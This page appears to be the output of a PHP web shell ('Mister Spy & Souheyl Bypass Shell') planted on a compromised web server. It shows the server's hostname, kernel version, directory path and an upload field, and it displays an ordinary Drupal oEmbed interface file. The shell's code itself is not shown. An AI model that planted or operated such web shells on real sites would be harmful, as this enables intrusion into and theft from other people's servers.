Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html1/china-sensors_old.de/core/modules/media/src/OEmbed/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html1/china-sensors_old.de/core/modules/media/src/OEmbed/ProviderRepositoryInterface.php

<?php

namespace Drupal\media\OEmbed;

/**
 * Defines an interface for a collection of oEmbed provider information.
 *
 * The provider repository is responsible for fetching information about all
 * available oEmbed providers, most likely pulled from the online database at
 * https://oembed.com/providers.json, and creating \Drupal\media\OEmbed\Provider
 * value objects for each provider.
 */
interface ProviderRepositoryInterface {

  /**
   * Returns information on all available oEmbed providers.
   *
   * @return \Drupal\media\OEmbed\Provider[]
   *   Returns an array of provider value objects, keyed by provider name.
   *
   * @throws \Drupal\media\OEmbed\ProviderException
   *   If the oEmbed provider information cannot be retrieved.
   */
  public function getAll();

  /**
   * Returns information for a specific oEmbed provider.
   *
   * @param string $provider_name
   *   The name of the provider.
   *
   * @return \Drupal\media\OEmbed\Provider
   *   A value object containing information about the provider.
   *
   * @throws \InvalidArgumentException
   *   If there is no known oEmbed provider with the specified name.
   */
  public function get($provider_name);

}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net